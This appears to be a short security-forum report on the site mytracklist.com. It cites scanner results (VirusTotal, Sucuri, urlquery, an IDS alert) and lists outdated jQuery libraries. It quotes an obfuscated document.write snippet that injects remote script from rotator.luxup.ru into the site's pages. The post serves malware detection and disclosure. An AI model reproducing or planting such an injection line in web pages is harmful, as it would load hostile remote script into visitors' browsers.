Re 4 suspicious pages detected: http://killmalware.com/mytracklist.com/
As for now missed by VT: https://www.virustotal.com/en/url/f547a6c510ef2609748150fdbf138e624ec6abe77ed0bbd5a6bdbcb562687811/analysis/#additional-info
Sucuri has it liated as malicious: https://sitecheck.sucuri.net/results/mytracklist.com :
Suspicious domain detected. Details: http://sucuri.net/malware/malware-entry-mwblacklisted35
document.write(‘<scr’+‘ipt type=“text/javascript” src="-http://rotator.luxup.ru/top/39/?t='+((new Date()).getTime()%10000000)*100+Math.round(Math.random()*99)+’"><‘+’/scr’+‘ipt>’);
Two scripts detected:
Script loaded: -http://rotator.luxup.ru/top/39/?t=22124440082
Script loaded: -http://rotator.luxup.ru/bottom/56;56/?t=22125110029
jQuery vulnerability: -http://mytracklist.com
Detected libraries:
jquery - 1.7 : -http://mytracklist.com/js/jquery-1.7.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
jquery - 1.2.6 : -http://mytracklist.com/js/jquery.js
Info: Severity: medium
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4969
http://research.insecurelabs.org/jquery/test/
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
2 vulnerable libraries detected
IDS alert for ET INFO DNS Query to a *.pw domain - Likely Hostile → https://urlquery.net/report.php?id=1456692367524
Leaseweb abuse IP badness history: https://www.virustotal.com/en/ip-address/37.48.81.152/information/
pol